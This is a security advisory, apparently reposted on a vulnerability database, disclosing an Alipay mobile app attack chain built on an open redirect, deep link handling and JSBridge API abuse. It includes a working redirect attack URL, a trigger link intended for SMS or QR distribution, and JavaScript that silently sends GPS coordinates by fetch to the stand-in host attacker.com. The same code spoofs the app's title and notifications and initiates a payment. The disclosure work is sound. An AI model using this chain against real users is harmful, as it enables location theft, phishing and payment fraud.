Vulners
Lucene search
📄 Alipay Open Redirect / API Attacker Payload Insertion
# Alipay Mobile App - DeepLink+JSBridge Unauthorized API Access Chain
# CVE Pending (MITRE Ticket #2005801)
# 6 Vulnerabilities, CVSS 7.4–9.3
## Advisory Information
Title: Alipay DeepLink+JSBridge Attack Chain — Silent GPS Exfiltration & Unauthorized API Access
Researcher: Jiqiang Feng (Innora AI Security Research)
Vendor: Ant Group / Alibaba Group
Product: Alipay (支付宝) v10.8.30.x (Android & iOS)
Users Affected: 1 billion+
Risk: Critical (CVSS 9.3)
CVE: 6 IDs pending (MITRE Ticket #2005801)
Vendor Response: "Normal functionality" — refused to patch
Disclosure Timeline: Responsible disclosure Feb 25 → Public Mar 11, 2026
## Summary
A single crafted URL enables a complete attack chain against Alipay mobile app users:
crafted link → open redirect via trusted domain (ds.alipay.com) → Alipay deep link handler → attacker page loads in privileged WebView → JSBridge APIs silently exfiltrate GPS, device data, and can initiate payment flows — all without user consent or visible prompt.
## Vulnerability Details
### Vuln 1: Open Redirect Whitelist Bypass (CWE-601 + CWE-939, CVSS 9.3)
ds.alipay.com accepts a "scheme" parameter that redirects to arbitrary alipays:// URLs.
Since ds.alipay.com is whitelisted, this bypasses all URL validation in the Alipay client.
Attack URL:
https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&url=[ATTACKER_URL]
### Vuln 2: Silent GPS Exfiltration (CWE-359, CVSS 7.4)
AlipayJSBridge.call('getLocation') returns GPS coordinates (8.8m accuracy) silently.
No user prompt, no consent dialog, completes in 7 seconds.
### Vuln 3: Unauthorized Payment Initiation (CWE-940, CVSS 8.6) [iOS only]
AlipayJSBridge.call('tradePay') can pre-fill and present payment screens.
Combined with "small amount password-free payment" feature, may enable zero-interaction payment.
### Vuln 4: UI Spoofing (CWE-451, CVSS 8.1)
AlipayJSBridge.call('showToast') and AlipayJSBridge.call('setTitle') allow attackers
to display fake system notifications and modify the WebView title bar.
### Vuln 5: Device Fingerprinting (CWE-200, CVSS 8.6)
AlipayJSBridge.call('getSystemInfo'), getNetworkType, getCameraPermission,
getMicrophonePermission expose device model, OS, carrier, sensor permissions.
### Vuln 6: DeepLink URL Scheme Handler Bypass (CWE-939, CVSS 9.1)
The alipays:// scheme handler loads external URLs in privileged WebView context
without proper origin validation, granting full JSBridge API access.
## Exploitable JSBridge APIs (Verified)
| API | Data Extracted | Android | iOS |
|-------------------|-----------------------------------|---------|-----|
| getLocation | GPS coords (8.8m accuracy) | Yes | Yes |
| getNetworkType | WiFi/cellular, carrier info | Yes | Yes |
| getSystemInfo | Device model, OS, screen | Yes | Yes |
| tradePay | Pre-fill payment screen | No | Yes |
| share | Trigger share dialog | No | Yes |
| scan | Activate QR scanner | No | Yes |
| chooseImage | Access photo picker | No | Yes |
| setTitle | Modify WebView title (UI spoof) | Yes | Yes |
| showToast | Fake system notifications | Yes | Yes |
## Proof of Concept
### Step 1: Trigger URL (distribute via SMS/email/QR)
https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&url=https%3A%2F%2Finnora.ai%2Fzfb%2Fpoc%2Fverify.html
### Step 2: JSBridge exploitation code (runs inside Alipay WebView)
```javascript
// Wait for bridge
document.addEventListener('AlipayJSBridgeReady', function() {
// Silent GPS exfiltration
AlipayJSBridge.call('getLocation', {}, function(result) {
// result.latitude, result.longitude — 8.8m accuracy
// Exfiltrate to attacker server
fetch('https://attacker.com/collect', {
method: 'POST',
body: JSON.stringify({
lat: result.latitude,
lng: result.longitude,
city: result.city
})
});
});
// Device fingerprinting
AlipayJSBridge.call('getSystemInfo', {}, function(info) {
// info.brand, info.model, info.system, info.version
});
// UI spoofing
AlipayJSBridge.call('setTitle', {title: 'Alipay Security Center'});
AlipayJSBridge.call('showToast', {content: 'Verification successful'});
// iOS only: payment initiation
AlipayJSBridge.call('tradePay', {tradeNO: 'ATTACKER_ORDER'});
});
```
## Verification Evidence
- 3 test devices: Samsung S25 Ultra (NZ), Xiaomi Redmi 12 (MY), iPhone 16 Pro (CN)
- 308 server-side GPS exfiltration logs with real coordinates
- 42 verification screenshots
- Vendor's security lead tested on iPhone from Hangzhou (Alipay HQ) — GPS captured silently in 7s
- iOS exposes 5 additional critical APIs vs Android
## Disclosure Timeline
2026-02-25 Initial TLS/SSL report to vendor
2026-03-06 Vendor: "cannot be practically exploited"
2026-03-07 Expanded report: 17 vulns with full end-to-end proof
2026-03-07 Whitelist bypass achieved in 2 minutes during live call with vendor's security lead
2026-03-08 Vendor security lead's own iPhone tested — GPS captured
2026-03-10 Vendor final response: "normal functionality"
2026-03-11 Public disclosure
2026-03-11 Vendor's law firm files takedown complaint (4 hours after publication)
2026-03-12 6 CVEs submitted to MITRE CNA-LR (Ticket #2005801)
## References
Technical Report: https://innora.ai/zfb/
PoC Demo Page: https://innora.ai/zfb/poc/trigger.html
Rebuttal to Legal Complaint: https://innora.ai/zfb/rebuttal.html
## Credits
Jiqiang Feng — Innora AI Security Research
[email protected] | https://innora.aiData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Mar 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8